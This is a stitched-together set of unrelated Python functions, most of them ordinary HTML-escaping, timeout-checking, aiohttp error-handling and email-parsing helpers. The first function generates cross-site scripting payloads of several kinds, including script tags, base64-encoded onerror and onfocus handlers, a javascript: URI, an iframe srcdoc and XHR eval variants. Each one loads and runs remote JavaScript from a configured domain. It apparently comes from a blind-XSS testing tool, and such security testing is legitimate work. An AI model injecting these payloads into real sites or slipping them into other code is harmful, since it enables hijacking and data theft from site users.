def payload_id_to_payload( payload_id, payload_token ): js_attrib_js = 'var a=document.createElement("script");a.src="https://' + settings["domain"] + '/' + payload_token + '";document.body.appendChild(a);' if payload_id == "generic_script_tag_payload": return "\"><script src=https://" + settings["domain"] + '/' + payload_token + "></script>" elif payload_id == "image_tag_payload": return "\"><img src=x id=" + html_escape( base64.b64encode( js_attrib_js ) ) + " onerror=eval(atob(this.id))>"; elif payload_id == "javascript_uri_payload": return "javascript:eval('var a=document.createElement(\\'script\\');a.src=\\'https://" + settings["domain"] + '/' + payload_token + "\\';document.body.appendChild(a)')"; elif payload_id == "input_tag_payload": return "\"><input onfocus=eval(atob(this.id)) id=" + html_escape( base64.b64encode( js_attrib_js ) ) + " autofocus>"; elif payload_id == "source_tag_payload": return "\"><video><source onerror=eval(atob(this.id)) id=" + html_escape( base64.b64encode( js_attrib_js ) ) + ">"; elif payload_id == "srcdoc_tag_payload": return "\"><iframe srcdoc=\"<script>var a=parent.document.createElement("script");a.src="https://" + settings["domain"] + '/' + payload_token + "";parent.document.body.appendChild(a);</script>\">"; elif payload_id == "xhr_payload": return '<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//' + settings["domain"] + '/' + payload_token + '");a.send();</script>' elif payload_id == "getscript_payload": return '<script>$.getScript("//' + settings["domain"] + '/' + payload_token + '")</script>' else: return "\"><script src=https://" + settings["domain"] + '/' + payload_token + "></script>"
def html_ify(text): ''' convert symbols like I(this is in italics) to valid HTML ''' t = html_escape(text) t = _ITALIC.sub("<em>" + r"\1" + "</em>", t) t = _BOLD.sub("<b>" + r"\1" + "</b>", t) t = _MODULE.sub(module_to_html, t) t = _URL_W_TEXT.sub("<a href='" + r"\2" + "'>" + r"\1" + "</a>", t) t = _URL.sub("<a href='" + r"\1" + "'>" + r"\1" + "</a>", t) t = _CONST.sub("<code>" + r"\1" + "</code>", t) return t
def escaped_with_field_highlighted(form_html, field_name): """ Return escaped HTML source code suitable for displaying; fields with name==field_name are highlighted. """ form = load_html(form_html) for elem in form.xpath('.//*[@name="{}"]'.format(field_name)): add_text_before(elem, '__START__') add_text_after(elem, '__END__') text = html_tostring(form) text = html_escape(text).replace('__START__', '<span style="font-size:large;color:#000">').replace('__END__', '</span>') return text
def _setTimeout(self, timeout_mins, period_secs): if not isinstance(timeout_mins, int): raise TypeError( (html_escape(str(timeout_mins)), "Must be integer")) if not isinstance(period_secs, int): raise TypeError((html_escape(str(period_secs)), "Must be integer")) timeout_secs = timeout_mins * 60 # special-case 0-minute timeout value by ignoring period if timeout_secs != 0: if period_secs == 0: raise ValueError('resolution cannot be 0') if period_secs > timeout_secs: raise ValueError( 'resolution cannot be greater than timeout ' 'minutes * 60 ( %s > %s )' % (period_secs, timeout_secs) ) # we need the timeout to be evenly divisible by the period if timeout_secs % period_secs != 0: raise ValueError( 'timeout seconds (%s) must be evenly divisible ' 'by resolution (%s)' % (timeout_secs, period_secs) ) # our timeout secs is the number of seconds that an item should # remain unexpired self._timeout_secs = timeout_secs # our _period is the number of seconds that constitutes a timeslice self._period = period_secs # timeout_slices == fewest number of timeslices that's >= timeout_secs self._timeout_slices = int( math.ceil(float(timeout_secs) / period_secs) )
def handle_error(self, status=500, message=None, payload=None, exc=None, headers=None, reason=None): """Handle errors. Returns http response with specific status code. Logs additional information. It always closes current connection.""" now = self._loop.time() try: if self._request_handler is None: # client has been disconnected during writing. return () if status == 500: self.log_exception("Error handling request") try: if reason is None or reason == '': reason, msg = RESPONSES[status] else: msg = reason except KeyError: status = 500 reason, msg = '???', '' if self.debug and exc is not None: try: tb = traceback.format_exc() tb = html_escape(tb) msg += '<br><h2>Traceback:</h2>\n<pre>{}</pre>'.format(tb) except: pass html = DEFAULT_ERROR_MESSAGE.format( status=status, reason=reason, message=msg).encode('utf-8') response = aiohttp.Response(self.writer, status, close=True) response.add_headers( ('CONTENT-TYPE', 'text/html; charset=utf-8'), ('CONTENT-LENGTH', str(len(html)))) if headers is not None: response.add_headers(*headers) response.send_headers() response.write(html) # disable CORK, enable NODELAY if needed self.writer.set_tcp_nodelay(True) drain = response.write_eof() self.log_access(message, None, response, self._loop.time() - now) return drain finally: self.keep_alive(False)
def html_ify(text): ''' convert symbols like I(this is in italics) to valid HTML ''' if not isinstance(text, string_types): text = to_text(text) t = html_escape(text) t = _ITALIC.sub(r"<em>\1</em>", t) t = _BOLD.sub(r"<b>\1</b>", t) t = _MODULE.sub(r"<span class='module'>\1</span>", t) t = _URL.sub(r"<a href='\1'>\1</a>", t) t = _LINK.sub(r"<a href='\2'>\1</a>", t) t = _CONST.sub(r"<code>\1</code>", t) t = _RULER.sub(r"<hr/>", t) return t.strip()
def _parseMessage(msg): res = { 'payload': msg.get_payload() } if msg.get_content_maintype() == 'text': enc = msg.get_content_charset() if enc is None: enc = 'ASCII' res['text'] = msg.get_payload(None, True).decode(enc) html = html_escape(res['text']) html = re.sub('https?://([a-zA-Z.0-9/\-_?;=]|&)+', lambda m: '<a href="' + m.group(0) + '">' + m.group(0) + '</a>', html) res['html'] = html else: res['html'] = '[attachment]' return res